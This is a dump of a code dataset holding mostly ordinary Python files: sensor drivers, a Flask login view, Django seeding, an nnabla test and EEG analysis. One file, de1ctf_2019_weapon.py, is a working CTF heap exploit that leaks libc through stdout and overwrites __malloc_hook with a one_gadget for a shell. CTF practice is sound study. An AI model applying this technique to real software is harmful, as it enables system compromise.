blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0080d6e109e103ff474bb678c4ce0d6365a10f90
|
0b2ae73bd91d843deb193d79b7c4eb02e900e851
|
/ADT75.py
|
b3bb7d6f5b3c37d352bc8f837b284d4d87f64082
|
[] |
no_license
|
ncdcommunity/Raspberry_pi_ADT75_Temperature_Sensor_Python_Library
|
c495d8db53f3d87585ab8a3eac883ede5dcd5bb4
|
e42bad0d5e057cf309d06b69b44b62ad4cca1da1
|
refs/heads/master
| 2021-09-05T15:16:24.670890
| 2018-01-29T07:03:01
| 2018-01-29T07:03:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,064
|
py
|
# Distributed with a free-will license.
# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.
# ADT75
# This code is designed to work with the ADT75_I2CS I2C Mini Module available from ControlEverything.com.
# https://www.controleverything.com/content/Temperature?sku=ADT75_I2CS#tabs-0-product_tabset-2
import smbus
import time
# Get I2C bus
bus = smbus.SMBus(1)
# I2C Address of the device
ADT75_DEFAULT_ADDRESS = 0x48
# ADT75 Register Map
ADT75_REG_TEMP = 0x00 # Temperature Value
ADT75_REG_CONFIG = 0x01 # Configuration Register
ADT75_REG_THYST = 0x02 # THYST setpoint
ADT75_REG_TOS = 0x03 # TOS setpoint
# ADT75 Configuration Register
ADT75_MODE_NORMAL = 0x00 # Normal Mode
ADT75_MODE_ONESHOT = 0x20 # One-Shot Mode
ADT75_FAULTQUEUE_1 = 0x00 # Fault Queue = 1
ADT75_FAULTQUEUE_2 = 0x08 # Fault Queue = 2
ADT75_FAULTQUEUE_4 = 0x10 # Fault Queue = 4
ADT75_FAULTQUEUE_6 = 0x18 # Fault Queue = 6
ADT75_MODE_CMP = 0x00 # Comparater Mode
ADT75_MODE_INT = 0x02 # Interrupt Mode
ADT75_MODE_SHUTDOWN = 0x01 # Shutdown Mode
class ADT75():
def __init__(self):
self.temp_configuration()
def temp_configuration(self):
"""Select the temperature configuration from the given provided values"""
TEMP_CONFIG = (ADT75_MODE_NORMAL | ADT75_FAULTQUEUE_1 | ADT75_MODE_CMP)
bus.write_byte_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_CONFIG, TEMP_CONFIG)
def read_temp(self):
"""Read data back from ADT75_REG_TEMP(0x00), 2 bytes, temp MSB, temp LSB"""
data = bus.read_i2c_block_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_TEMP, 2)
# Convert the data to 12-bits
temp = ((data[0] * 256) + data[1]) / 16
if temp > 2047 :
temp -= 4096
cTemp = temp * 0.0625
fTemp = (cTemp * 1.8) + 32
return {'c' : cTemp, 'f' : fTemp}
from ADT75 import ADT75
adt75 = ADT75()
while True:
temp = adt75.read_temp()
print "Temperature in Celsius : %.2f C"%(temp['c'])
print "Temperature in Fahrenheit : %.2f F"%(temp['f'])
print " ***************************************** "
time.sleep(1)
|
[
"ryker1990@gmail.com"
] |
ryker1990@gmail.com
|
e05e44ea2d5ee7d245bc918ab507c0a29739aaae
|
8692807f1dfa8c18c61df07cfafbbd27d4e66fba
|
/LONG-CHALLENGE/PROXYC.sol.py
|
cead1b911458e67e7b124171a7ef3ddec767cfb8
|
[] |
no_license
|
sharmakajal0/codechef_problems
|
00381e9bf1996b859e46f087c2ffafd9d7a10ef1
|
0b979029e0a821f47fbdd6f9c624daee785a02e7
|
refs/heads/master
| 2020-05-29T15:04:40.459979
| 2020-03-29T08:44:53
| 2020-03-29T08:44:53
| 189,212,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
#!/usr/bin/env python
import string
import random
for _ in range(int(input())):
D = int(input())
P = 0
proxy = 0
S = input()
for i in range(len(S)):
if(S[i] == 'P'):
P += 1
A = P/D
if A >= 0.75:
print(proxy)
else:
for d in range(D):
if d == 1 and d == 2 and d == D - 1 and d == D - 2:
proxy += 0
elif d == 'P' and d + 1 =='P':
proxy += 1
else:
proxy += 0
continue
# else:
# proxy = proxy + 1
# break
P = P + proxy
A = P / D
if A >= 0.75:
print(proxy)
else:
print("-1")
|
[
"sharma.kajal.sitm@gmail.com"
] |
sharma.kajal.sitm@gmail.com
|
c339f9eb2a18aa108c8f03d0636db2b68a387b05
|
487aab917a808b30ebeccf90cd15ed59ac9d776b
|
/Server/app/views/account/auth.py
|
00563a701cf1bf96abd6f713b7d59feb79dee4b7
|
[] |
no_license
|
DSM-DMS/DMS-OpenAPI-Backend
|
62fffc913b5cb562fbca3333223f8abfb2cf2a8a
|
1f0c434e98c4cc5d2150af6f533109b1797d8659
|
refs/heads/master
| 2020-03-20T19:48:56.576943
| 2018-06-18T06:45:05
| 2018-06-18T06:45:05
| 137,655,168
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
from flask import Blueprint, Response, request
from flask_jwt_extended import create_access_token, create_refresh_token
from flask_restful import Api
from flasgger import swag_from
from app.docs.account.auth import *
from app.models.account import StudentModel, TokenModel, AccessTokenModel, RefreshTokenModel
from app.views import BaseResource, json_required
api = Api(Blueprint(__name__, __name__))
api.prefix = '/student'
@api.resource('/auth')
class Auth(BaseResource):
@json_required({'id': str, 'password': str})
@swag_from(AUTH_POST)
def post(self):
"""
학생 로그인
"""
payload = request.json
student = StudentModel.objects(id=payload['id'], pw=self.encrypt_password(payload['password'])).first()
return ({
'accessToken': create_access_token(TokenModel.generate_token(AccessTokenModel, student, request.headers['USER-AGENT'])),
'refreshToken': create_refresh_token(TokenModel.generate_token(RefreshTokenModel, student, request.headers['USER-AGENT']))
}, 201) if student else Response('', 401)
|
[
"python@istruly.sexy"
] |
python@istruly.sexy
|
204b4e459a1699224604a3af5706b1de46d495db
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.TZH/Serif_12/pdf_to_json_test_Latn.TZH_Serif_12.py
|
cd6289fc1d1643cc357cf40015e0694b8ed2d3ee
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.TZH/Serif_12/udhr_Latn.TZH_Serif_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
337cee5e29835896cab1957d702d1c6c2b4c4d23
|
7e40c8bb28c2cee8e023751557b90ef7ef518326
|
/de1ctf_2019_weapon/de1ctf_2019_weapon.py
|
b20af85652888221b9c83fe6865667fded000806
|
[] |
no_license
|
1337536723/buuctf_pwn
|
b6e5d65372ed0638a722faef1775026a89321fa3
|
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
|
refs/heads/master
| 2023-08-29T19:35:04.352530
| 2021-11-16T14:06:20
| 2021-11-16T14:06:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,409
|
py
|
from pwn import *
#libc = ELF('libc-2.23.so')
libc = ELF('libc-2.23.buu.so')
def debug(s):
gdb.attach(p, '''
source ~/libc/loadsym.py
loadsym ~/libc/2.23/64/libc-2.23.debug.so
''' + s)
def alloc(index, size, name):
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', str(size).encode())
p.sendlineafter(b'index: ', str(index).encode())
p.sendafter(b'name:', name)
def delete(index):
p.sendlineafter(b'choice >> ', b'2')
p.sendlineafter(b'idx :', str(index).encode())
def edit(index, name):
p.sendlineafter(b'choice >> ', b'3')
p.sendlineafter(b'idx: ', str(index).encode())
p.sendafter(b'content:', name)
def exploit():
alloc(0, 0x20, p64(0) + p64(0x21))
alloc(1, 0x10, b'a')
alloc(2, 0x10, b'a')
#wtf, glibc will check the header of next chunk while free, so we need to write a fake header (0x70, 0x51)
alloc(3, 0x10, p64(0x70) + p64(0x51))
delete(1)
delete(2)
edit(2, b'\x10')
alloc(1, 0x10, b'a')
alloc(1, 0x10, b'a')
alloc(4 ,0x30, b'a')
alloc(5 ,0x30, b'a')
alloc(6, 0x10, b'a')
edit(0, p64(0) + p64(0x71))
delete(1)
edit(0, p64(0) + p64(0x101))
delete(1)
edit(0, p64(0) + p64(0x71))
edit(1, b'\xdd\x75')
alloc(0, 0x60, b'a')
alloc(0, 0x60, b'a')
alloc(6, 0x60, b'a')
payload = b'a' * ( 0x620 - 0x5ed ) + p64(0xfbad1800) + p64(0) * 3 + b'\x00'
edit(0, payload)
p.recvuntil(b'\x7f')
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 131 - libc.sym['_IO_2_1_stdout_']
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
one_gadgets = [0x45206, 0x4525a, 0xef9f4, 0xf0897]
one_gadgets_buu = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one = libc_base + one_gadgets_buu[3]
delete(6)
edit(6, p64(malloc_hook - 0x23))
#context.log_level = 'debug'
alloc(6, 0x60, b'a')
alloc(6, 0x60, b'a' * 0x13 + p64(one))
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', b'1')
p.sendlineafter(b'index: ', b'1')
p.interactive()
if __name__ == '__main__':
flag = False
while not flag:
try:
#p = process('./de1ctf_2019_weapon')
p = remote('node4.buuoj.cn', 25710)
exploit()
flag = True
except:
p.close()
|
[
"admin@srmxy.cn"
] |
admin@srmxy.cn
|
062eb22c54e54134722697966c14311f9e383461
|
daa053212901b51273bb1f8a6ca3eddac2b5cbaf
|
/main/apps/companies/management/commands/seed_consultants.py
|
5df7ab0584e1e6e4412334b82052d2652e8c51ca
|
[] |
no_license
|
truhlik/directit
|
11fb45d482d454b55888f38afe0f64ce533788ad
|
eb10654b64cbe4232811594b936f8e3d0381754e
|
refs/heads/main
| 2023-08-30T10:03:45.376159
| 2021-10-06T19:02:15
| 2021-10-06T19:02:15
| 414,334,714
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,114
|
py
|
import os
import json
from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import transaction
from main.apps.categories.models import Category
from main.apps.companies.models import Company
from main.apps.companies import constants
from main.apps.tags.models import Tag
class Command(BaseCommand):
help = 'Seed Consultants'
# konvertováno pomocí http://beautifytools.com/excel-to-json-converter.php
def handle(self, *args, **options):
path = os.path.join(settings.BASE_DIR, 'seeds', 'consultants2.json')
with open(path, mode='r') as f:
data = json.load(f)
with transaction.atomic():
self.process_data(data)
def process_data(self, data, parent=None):
for konzultant_dct in data['Konzultanti']:
self._create_consultant(konzultant_dct)
def _create_consultant(self, data):
if Company.objects.filter(name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', '')).exists():
return
c = Company(
role=constants.COMPANY_ROLE_CONSULTANT,
name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', ''),
description=data.get('Specifikace', None),
email=data.get('Email', None),
phone=data.get('Telefon', None),
city=data.get('Město', None),
)
c.save()
self.add_tags(c, data.get('Tagy - Technologie', '').split(','))
self.add_tags(c, data.get('Tagy - Kompetence', '').split(','))
def add_tags(self, consultant, data):
tags = []
for tag in data:
t, created = Tag.objects.get_or_create(name=tag.strip())
if t is not None:
tags.append(t)
else:
print(tag)
consultant.tags.add(*tags)
def add_categories(self, consultant, data):
tags = []
for category in data:
t = Category.objects.filter(name=category.strip()).first()
if t is not None:
tags.append(t)
consultant.categories.add(*tags)
|
[
"lubos@endevel.cz"
] |
lubos@endevel.cz
|
0dbd5fdba95bed8a268db8202b3fb87885b024ec
|
7b270cf5f9d0a3e26b5afd758563c6cff73a5248
|
/comportamentais/templateMethod/musica/musica/ordenadores/por_nome.py
|
20811813acfc8389cb954bc7cf5afb90f6bd5ea6
|
[] |
no_license
|
reginaldosantarosa/DesignPatterns
|
10810672d3831e562ec636a5f66bd709c797ca34
|
bec4247f52b8d2e1fe41c570408816a5d4b22608
|
refs/heads/master
| 2020-04-04T06:54:19.757054
| 2018-01-04T03:06:05
| 2018-01-04T03:06:05
| 155,761,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from musica.ordenador import Ordenador
class PorNome(Ordenador):
"""
Ordena as músicas por nome.
"""
def vem_antes(self, musica1, musica2):
"""
Verifica se o nome da musica1 vem antes do nome da musica2
ou se os nomes são iguais
"""
if (musica1.nome >= musica2.nome):
return True
return False
|
[
"victorhad@gmail.com"
] |
victorhad@gmail.com
|
a58aad7520eda26f26eea0cbde53195c6e1f95ff
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-dataplex/samples/generated_samples/dataplex_v1_generated_dataplex_service_list_lake_actions_async.py
|
6bb70e947a1d2da68ce6f3f24464c8d42da2e31a
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ListLakeActions
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dataplex
# [START dataplex_v1_generated_DataplexService_ListLakeActions_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import dataplex_v1
async def sample_list_lake_actions():
# Create a client
client = dataplex_v1.DataplexServiceAsyncClient()
# Initialize request argument(s)
request = dataplex_v1.ListLakeActionsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_lake_actions(request=request)
# Handle the response
async for response in page_result:
print(response)
# [END dataplex_v1_generated_DataplexService_ListLakeActions_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
03d54f61b29f53b93ad2fd757e4e11559959bdce
|
293d7ab59c9e7ff4e1341fb8e6504a89f3384666
|
/python/test/utils/test_graph_converters/test_batch_normalization_self_folding.py
|
1e2d303962a499a835d6efa13a3da5acd8dc33bf
|
[
"Apache-2.0"
] |
permissive
|
CrimsonTuna/nnabla
|
903423b8eb3617c3623952605bcdd77bb5ab2a56
|
36328e574d77f1cc9ee0051f33159a2dc4f03013
|
refs/heads/master
| 2023-03-29T07:12:33.444996
| 2021-04-11T09:33:21
| 2021-04-11T09:33:21
| 356,857,925
| 0
| 0
|
Apache-2.0
| 2021-04-11T13:09:02
| 2021-04-11T12:10:47
| null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
# Copyright (c) 2020 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import pytest
import numpy as np
import nnabla as nn
import nnabla.experimental.graph_converters as GC
from .ref_graphs.resnets import small_cf_resnet, small_bn_self_folding_resnet
batch_size = 1
resnet_ref = small_bn_self_folding_resnet
@pytest.mark.parametrize('seed', [313])
@pytest.mark.parametrize('test', [True])
@pytest.mark.parametrize('graph_ref, graph_act', [(resnet_ref, small_cf_resnet)])
def test_batch_normalization_self_folding(seed, test, graph_ref, graph_act):
from .graph_converter_test_utils import structure_tester, value_tester
# Random number
np.random.seed(seed)
rng = np.random.RandomState(seed)
# Graph
x_data = rng.randn(batch_size, 3, 32, 32)
x = nn.Variable.from_numpy_array(x_data)
y_tgt = graph_act(x, test=test)
# FunctionModifier
modifiers = []
modifiers.append(GC.BatchNormalizationSelfFoldingModifier())
y_act = GC.GraphConverter(modifiers).convert(y_tgt)
# Ref Graph
y_ref = graph_ref(x, name='bn-self-folding-graph-ref')
# Test
structure_tester(y_ref, y_act)
value_tester(y_tgt, y_act, rtol=6e-02, atol=5e-02)
|
[
"Kazuki.Yoshiyama@sony.com"
] |
Kazuki.Yoshiyama@sony.com
|
82bd13fb6585eb7e350d867d90ba5d73d5caf38e
|
5850d0bd221cec491f94cf68a6d880abdb838f0e
|
/tests/exoatlet/spat_decomp.py
|
cbefd3bddcc77909c7648fbe0e25bd9bd3f24412
|
[] |
no_license
|
nickware44/DeepBCI
|
336a437e2a519d09e74f57e692e4c59ac7b1db70
|
96b99b36e888a740dd955b7f6d3f8f05b94efd17
|
refs/heads/master
| 2023-08-03T09:08:20.283055
| 2023-07-27T19:17:13
| 2023-07-27T19:17:13
| 336,832,704
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,260
|
py
|
path_to_nfblab = r'C:\Projects\nfblab\nfb'
import sys
import numpy as np
import pylab as plt
import pandas as pd
import scipy.signal as sg
sys.path.insert(0, path_to_nfblab)
from utils.load_results import load_data
from pynfb.signal_processing.filters import ButterFilter
from pynfb.signal_processing.decompositions import ICADecomposition, CSPDecomposition
from pynfb.inlets.montage import Montage
from mne.viz import plot_topomap
# settings
h5_file = r'C:\Projects\nfblab\nfb\pynfb\results\exoatlet_kolai_stay_go_10-24_15-47-00\experiment_data.h5'
band = (15, 30)
method = 'ica'
np.random.seed(401)
# load data
df, fs, channels, p_names = load_data(h5_file)
fs = int(fs)
eeg_channels = channels[:30]
n_channels = len(eeg_channels)
montage = Montage(eeg_channels)
print('Fs: {}Hz\nAll channels: {}\nEEG channels: {}\nBlock sequence: {}'.format(
fs, ', '.join(channels), ', '.join(eeg_channels), '-'.join(p_names)))
# pre filter
pre_filter = ButterFilter(band, fs, n_channels)
df[eeg_channels] = pre_filter.apply(df[eeg_channels])
df = df.iloc[fs*5:]
# spatial decomposition
if method == 'ica':
decomposition = ICADecomposition(eeg_channels, fs)
elif method == 'csp':
decomposition = CSPDecomposition(eeg_channels, fs)
else:
raise ValueError('Bad method name. Use "ica" or "csp".')
# select data between first and second "pause" block
first_b_number = p_names.index('Pause') + 1
second_b_number = 10000# p_names.index('Pause', 1) + 1
X = df.loc[(df.block_number>first_b_number) & (df.block_number<second_b_number)]
# fit decomposition
decomposition.fit(X[eeg_channels], X.block_name=='Go')
# init axes
n_rows = 5
n_cols = 6
fig, axes = plt.subplots(n_rows, n_cols * 2, figsize=(15, 10))
plt.subplots_adjust(hspace=1)
# sort by erd
erds = np.zeros(n_channels)
erd_band = band # (18, 30)
for k in range(n_channels):
filt = decomposition.filters[:, k]
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > erd_band[0]) & (freq < erd_band[1])
erds[k] = (st_spec[freq_slice].mean() - go_spec[freq_slice].mean()) / st_spec[freq_slice].mean()
# plot axes
for j, k in enumerate(np.argsort(erds)[::-1]):
topo = decomposition.topographies[:, k]
filt = decomposition.filters[:, k]
ax = axes[j // n_cols, j % n_cols * 2]
plot_topomap(topo, montage.get_pos(), axes=ax, show=False, contours=0)
ax.set_title(str(k))
ax.set_xlabel('{:.1f}%'.format(erds[k] * 100))
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > 3) & (freq < 40)
ax = axes[j // n_cols, j % n_cols * 2 + 1]
ax.plot(freq[freq_slice], go_spec[freq_slice])
ax.plot(freq[freq_slice], st_spec[freq_slice])
ax.fill_between(freq[freq_slice], go_spec[freq_slice], st_spec[freq_slice], alpha=0.5)
ax.get_yaxis().set_visible(False)
ax.set_xticks([0, 10, 20, 30, 40])
ax.set_xticklabels([0, 10, 20, 30, 40])
plt.show()
|
[
"n.m.smetanin@gmail.com"
] |
n.m.smetanin@gmail.com
|
cddba55aea5b0e697b0e759fa4236c9772032db5
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/070_oop/007_exceptions/_exercises/templates/GoCongr/002_Exceptions.py
|
558802c1cef142e35946dbce32921cc93b0cf096
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 686
|
py
|
# # -*- coding: utf-8 -*-
#
# # Nested handlers
# ___ # Обрабатываем исключения
# ___ # Вложенный обработчик
# x = 1 / 0 # Ошибка: деление на 0
# ____ N...
# print("Неопределенный идентификатор")
# ____ I...
# print("Несуществующий индекс")
# print("Выражение после вложенного обработчика")
# ____ Z..
# print("Обработка деления на 0")
# x _ 0
# print? # Выведет: 0
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
f572de46bf3442d83632a194c67fbc4ea0587da3
|
9a1dbd1d6dcdb5a4d238fa72ff1eb8e8ac99c9fb
|
/EBookReading/wsgi.py
|
b4b370837d698fee742a9d781becb9f7af5f318b
|
[] |
no_license
|
chintan-27/E-Book-Reading-Website
|
85c0aa7515169f13bb8939aba9ee36bc64af17b8
|
693a75756f9e9b99631bff7973c4da16ed3716a4
|
refs/heads/main
| 2023-08-22T06:04:48.118415
| 2021-09-08T05:37:35
| 2021-09-08T05:37:35
| 378,327,140
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
"""
WSGI config for EBookReading project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'EBookReading.settings')
application = get_wsgi_application()
os.environ["DJANGO_ALLOW_ASYNC_UNSAFE"] = "true"
|
[
"chintan.acharya27@gmail.com"
] |
chintan.acharya27@gmail.com
|
28f6441efdadfc02cdae431872a2d080a5030079
|
f504253210cec1c4ec6c3ea50a45564db7d6cd7f
|
/prettyqt/core/transposeproxymodel.py
|
81174a1c4b71d3ea47ef74b62ff9f018ad7d81d7
|
[
"MIT"
] |
permissive
|
phil65/PrettyQt
|
b1150cb4dce982b9b8d62f38f56694959b720a3e
|
f00500d992d1befb0f2c2ae62fd2a8aafba7fd45
|
refs/heads/master
| 2023-08-30T21:00:08.905444
| 2023-08-17T12:24:45
| 2023-08-17T12:24:45
| 177,451,205
| 17
| 5
|
MIT
| 2020-08-15T22:21:18
| 2019-03-24T18:10:21
|
Python
|
UTF-8
|
Python
| false
| false
| 220
|
py
|
from __future__ import annotations
from prettyqt import core
class TransposeProxyModel(core.AbstractProxyModelMixin, core.QTransposeProxyModel):
"""This proxy transposes the source model."""
ID = "transpose"
|
[
"philipptemminghoff@googlemail.com"
] |
philipptemminghoff@googlemail.com
|
1b71200f5245e6bae920920c97bfa9306e71d00e
|
50aa9303450e06d1172f78c0478a58e5113d9bb9
|
/958palindrome-data-stream.py
|
affb066b625a80be4a626f58e58e577ff236cabd
|
[] |
no_license
|
zlldt/LintCode
|
6e1041b78a301651378833caf7fd7db9ce112ec5
|
e5012161131a8c8557bdb0296980b2a0b712c620
|
refs/heads/master
| 2021-06-27T05:24:08.471072
| 2019-03-02T12:56:26
| 2019-03-02T12:56:26
| 105,424,020
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
class Solution:
"""
@param s: The data stream
@return: Return the judgement stream
"""
def getStream(self, s):
# Write your code here
length = len(s)
result = [1 for x in range(length)]
dict ={}
for i in range(length):
if s[i] in dict:
dict[s[i]] += 1
else:
dict[s[i]] = 1
if len(dict)==1:
result[i] = 1
count = 0
for k,v in dict.items():
if v % 2 == 1:
count += 1
if count>1:
result[i] = 0
return result
|
[
"noreply@github.com"
] |
zlldt.noreply@github.com
|
b8c22bcb6d3ac5f046570154dacdc01b736d759f
|
b420377a638dc9a5d8c09ebc39b0448d47ddb74e
|
/ddd-todolist-sample/todolist/port/eventbus.py
|
5431f4676032719da1a48a8695071bda80b80f8a
|
[] |
no_license
|
shimakaze-git/drf-sample
|
d4e4e8e4d380f0b77e807d4bbf4e3f0d98ee6bcd
|
4294cd5adeea0ef51d3b7eee6a154d23dd089afc
|
refs/heads/master
| 2022-05-02T20:19:09.901257
| 2019-09-15T12:46:51
| 2019-09-15T12:46:51
| 205,698,781
| 0
| 0
| null | 2022-04-22T22:29:32
| 2019-09-01T15:52:14
|
Python
|
UTF-8
|
Python
| false
| false
| 263
|
py
|
from abc import ABCMeta, abstractmethod
class EventBus:
""" ドメインイベントの通知インタフェース. """
__metaclass__ = ABCMeta
@abstractmethod
def publish(self, event):
""" ドメインイベントを通知する. """
|
[
"shimakaze.soft+github@googlemail.com"
] |
shimakaze.soft+github@googlemail.com
|
527160e77429557933b7824c4d79f4ae526f1411
|
7d949b9f19e4c5c897b3aef76e604f2c0eee7112
|
/src-python/saccade_analysis/tammero_flydradb/report_axis_angle.py
|
88f17a3bd3e549f78714e134fbced84c944473c9
|
[] |
no_license
|
AndreaCensi/saccade_analysis
|
d3fad3a1a406b97c4dcf9cdc82b9b2ce1fbf42df
|
71b87e9225b16317ffa9a581b3c62d8343fe7bfa
|
refs/heads/master
| 2016-09-11T06:49:22.254391
| 2011-12-20T06:39:30
| 2011-12-20T06:39:30
| 952,465
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,889
|
py
|
from contracts import contract
from reprep import Report
import numpy as np
from ..markov import binomial_stats
def create_report_axis_angle(id, desc, saccades):
r = Report('axis_angle')
#
# axis_angle = saccades['axis_angle']
# saccade_angle = saccades['saccade_angle']
stats = statistics_distance_axis_angle(saccades,
num_distance_intervals=10,
axis_angle_bin_interval=10,
axis_angle_bin_size=10
)
f = r.figure(cols=1)
for i, section in enumerate(stats['distance_sections']):
distance_min = section['distance_min']
distance_max = section['distance_max']
prob_left = section['prob_left']
prob_right = section['prob_right']
margin_left = section['margin_left']
margin_right = section['margin_right']
bin_centers = section['bin_centers']
num_saccades = section['num_saccades']
n = len(bin_centers)
with r.data_pylab('section%d' % i) as pylab:
el = np.zeros((2, n))
el[0, :] = +(margin_left[0, :] - prob_left)
el[1, :] = -(margin_left[1, :] - prob_left)
pylab.errorbar(bin_centers, prob_left, el, None, None,
ecolor='g', label='left', capsize=8, elinewidth=1)
er = np.zeros((2, n))
er[0, :] = +(margin_right[0, :] - prob_right)
er[1, :] = -(margin_right[1, :] - prob_right)
pylab.errorbar(bin_centers, prob_right, er, None, None,
ecolor='r', label='right', capsize=8, elinewidth=1)
pylab.plot(bin_centers, prob_left, 'g-', label='left')
pylab.plot(bin_centers, prob_right, 'r-', label='right')
pylab.xlabel('axis angle (deg)')
pylab.ylabel('probability of turning')
pylab.title('Direction probability for distance in [%dcm,%dcm], %d saccades' %
(distance_min * 100, distance_max * 100, num_saccades))
pylab.plot([0, 0], [0, 1], 'k-')
pylab.axis([-180, 180, 0, 1])
pylab.legend()
r.last().add_to(f)
